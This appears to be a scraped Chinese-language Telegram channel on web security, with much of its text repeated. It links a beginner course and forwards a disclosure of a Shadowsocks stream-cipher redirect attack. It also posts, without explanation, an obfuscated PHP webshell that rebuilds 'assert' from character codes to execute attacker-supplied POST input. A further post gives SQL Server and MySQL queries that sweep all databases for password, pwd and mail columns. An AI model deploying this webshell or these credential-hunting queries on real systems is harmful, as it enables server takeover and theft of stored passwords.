【本频道只做纯技术分享】
关于本频道
本频道想像灯塔为那些对信息安全领域有兴趣的朋友照明航路
存在即有意义 本频道目的
网络资源过滤器:分享收集有一定质量的信安资料(包括Web安全 渗透测试 APT但不限于)
原创内容制造机:一些知识点总结,一些帮助新手入门的文章
不是大佬,一些稚嫩的分享,同时帮助自己巩固消化知识
关于本频道
本频道想像灯塔为那些对信息安全领域有兴趣的朋友照明航路
存在即有意义 本频道目的
网络资源过滤器:分享收集有一定质量的信安资料(包括Web安全 渗透测试 APT但不限于)
原创内容制造机:一些知识点总结,一些帮助新手入门的文章
不是大佬,一些稚嫩的分享,同时帮助自己巩固消化知识
#资源分享
对新手来说算是比较全面体系的一套视频教程,耐得下性子的话,一套流程下来足够入门了.不同水平的人看是不一样的感觉,学到的东西也不一样.吸收里面的知识 看文档补充,扩展知识面https://telegra.ph/%E5%88%86%E4%BA%AB%E4%B8%80%E5%A5%97Web%E5%AE%89%E5%85%A8%E5%85%A5%E9%97%A8%E6%95%99%E7%A8%8B-10-25
对新手来说算是比较全面体系的一套视频教程,耐得下性子的话,一套流程下来足够入门了.不同水平的人看是不一样的感觉,学到的东西也不一样.吸收里面的知识 看文档补充,扩展知识面https://telegra.ph/%E5%88%86%E4%BA%AB%E4%B8%80%E5%A5%97Web%E5%AE%89%E5%85%A8%E5%85%A5%E9%97%A8%E6%95%99%E7%A8%8B-10-25
Telegraph
分享一套入门教程
链接在最下面 1.php编程 ----1.讲师介绍+http协议+挖掘BUG.mp4 ----2.搭建apache+php+mysql.mp4 ----3.搭建域名.mp4 ----4.PHP变量+变量的引用.mp4 ----5.数据类型+字符串函数+常量+运算符+if判断+switch+while.mp4 ----6.补上昨天运算符与优先级.mp4 ----7.for循环.mp4 ----8.函数.mp4 ----9.return+引用函数.mp4 ----10.数组.mp4 ----11.时间戳+系统变量+文件操作.mp4…
<?php
class ass{
public static function toStr($bytes) {
$str = '';
foreach($bytes as $ch) {
$str .= chr($ch);
}
return $str;
}
function getac(){
$cars = array(array("Volvo",100,$_POST[a]));
return $cars[0][2];
}
}
$asser = array(97,115,115,101,114,116);
$ccc = new ass();
$acx = $ccc->toStr($asser);
$acx($ccc->getac());
?>
class ass{
public static function toStr($bytes) {
$str = '';
foreach($bytes as $ch) {
$str .= chr($ch);
}
return $str;
}
function getac(){
$cars = array(array("Volvo",100,$_POST[a]));
return $cars[0][2];
}
}
$asser = array(97,115,115,101,114,116);
$ccc = new ass();
$acx = $ccc->toStr($asser);
$acx($ccc->getac());
?>
Forwarded from 科技圈的日常 (Jimmy Tian)
一份来自于奇虎 360 核心安全团队于今日披露的论文显示:
Shadowsocks 的 steam 加密存在漏洞,导致数据包头部可被修改。
攻击者可以利用修改过后的数据包进行「重定向」,从而进行 MITM 攻击。
目前受影响的包括:shadowsocks-py, shadowsocoks-go, shadowsocoks-nodejs
研究者推荐仅使用 shadowsocks-libev 配合以下三种加密算法:
aes-gcm chacha-ietf-poly1305 xchacha20-ietf-poly1305 (备注:SSR 不支持任意一种)
POC 与论文地址:https://github.com/edwardz246003/shadowsocks
部分原文摘抄:
Shadowsocks 的 steam 加密存在漏洞,导致数据包头部可被修改。
攻击者可以利用修改过后的数据包进行「重定向」,从而进行 MITM 攻击。
目前受影响的包括:shadowsocks-py, shadowsocoks-go, shadowsocoks-nodejs
研究者推荐仅使用 shadowsocks-libev 配合以下三种加密算法:
aes-gcm chacha-ietf-poly1305 xchacha20-ietf-poly1305 (备注:SSR 不支持任意一种)
POC 与论文地址:https://github.com/edwardz246003/shadowsocks
部分原文摘抄:
A passive attacker can easily decrypt all the encrypted shadowsocks packet using our redirect attack. Even more, a man-in-the-middle attacker can modify traffic in real time like there is no encryption at all.
What surprised us was that only shadowsockslibev support AEAD cipher. All other official implementation only support steam cipher. This means that the data integrity and authenticity of most SS users is not guaranteed from a Mitm attacker.
GitHub
GitHub - edwardzpeng/shadowsocks: Redirect attack on Shadowsocks stream ciphers
Redirect attack on Shadowsocks stream ciphers. Contribute to edwardzpeng/shadowsocks development by creating an account on GitHub.
## 数据库信息检索技巧
部分摘自网络
sql server 全部库:
===================================================================
declare @i int,@id int,@dbname varchar(255),@sql varchar(255)
set @i = 6
set @id=(select count(*) from master..sysdatabases)
drop table #t
create table #t (
dbname varchar(255),
tablename varchar(255),
columnname varchar(255)
)
while (@i < @id)
begin
set @i = @i + 1;
set @dbname = (select name from master..sysdatabases where dbid= @i)
set @sql = 'use '+ @dbname+';insert [#t] select table_catalog,table_name,column_name from information_schema.columns where column_name like ''%pass%'' or column_name like ''%pwd%'' or column_name like ''%mail%'''
exec (@sql)
--print @sql
end
select * from #t
drop table #t
go
sql server单个库:
====================================================================
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND (syscolumns.name LIKE '%pass%' or syscolumns.name LIKE '%pwd%' or syscolumns.name LIKE '%first%');
mysql全库:
===================================================================
select table_schema,table_name,column_name from information_schema.columns where table_schema !=0x696E666F726D6174696F6E5F736368656D61 and table_schema !=0x6D7973716C and table_schema !=0x706572666F726D616E63655F736368656D61 and (column_name like '%pass%' or column_name like '%pwd%');
sql server 全库搜关键字符
===================================================================
declare @str varchar(100)
set @str='test' --要搜索的字符串
declare @s varchar(8000)
declare tb cursor local for
select s='if exists(select 1 from ['+b.name+'] where ['+a.name+'] like ''%'+@str+'%'')
print ''所在的表及字段: ['+b.name+'].['+a.name+']'''
from syscolumns a join sysobjects b on a.id=b.id
where b.xtype='U' and a.status>=0
and a.xusertype in(175,239,231,167)
open tb
fetch next from tb into @s
while @@fetch_status=0
begin
exec(@s)
fetch next from tb into @s
end
close tb
deallocate tb
## 模糊搜索表名
SELECT sysobjects.name as tablename, sysobjects.xtype as xtype FROM sysobjects
where (sysobjects.xtype = 'U' or sysobjects.xtype = 'V') and sysobjects.name like '%Event%'
部分摘自网络
sql server 全部库:
===================================================================
declare @i int,@id int,@dbname varchar(255),@sql varchar(255)
set @i = 6
set @id=(select count(*) from master..sysdatabases)
drop table #t
create table #t (
dbname varchar(255),
tablename varchar(255),
columnname varchar(255)
)
while (@i < @id)
begin
set @i = @i + 1;
set @dbname = (select name from master..sysdatabases where dbid= @i)
set @sql = 'use '+ @dbname+';insert [#t] select table_catalog,table_name,column_name from information_schema.columns where column_name like ''%pass%'' or column_name like ''%pwd%'' or column_name like ''%mail%'''
exec (@sql)
--print @sql
end
select * from #t
drop table #t
go
sql server单个库:
====================================================================
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND (syscolumns.name LIKE '%pass%' or syscolumns.name LIKE '%pwd%' or syscolumns.name LIKE '%first%');
mysql全库:
===================================================================
select table_schema,table_name,column_name from information_schema.columns where table_schema !=0x696E666F726D6174696F6E5F736368656D61 and table_schema !=0x6D7973716C and table_schema !=0x706572666F726D616E63655F736368656D61 and (column_name like '%pass%' or column_name like '%pwd%');
sql server 全库搜关键字符
===================================================================
declare @str varchar(100)
set @str='test' --要搜索的字符串
declare @s varchar(8000)
declare tb cursor local for
select s='if exists(select 1 from ['+b.name+'] where ['+a.name+'] like ''%'+@str+'%'')
print ''所在的表及字段: ['+b.name+'].['+a.name+']'''
from syscolumns a join sysobjects b on a.id=b.id
where b.xtype='U' and a.status>=0
and a.xusertype in(175,239,231,167)
open tb
fetch next from tb into @s
while @@fetch_status=0
begin
exec(@s)
fetch next from tb into @s
end
close tb
deallocate tb
## 模糊搜索表名
SELECT sysobjects.name as tablename, sysobjects.xtype as xtype FROM sysobjects
where (sysobjects.xtype = 'U' or sysobjects.xtype = 'V') and sysobjects.name like '%Event%'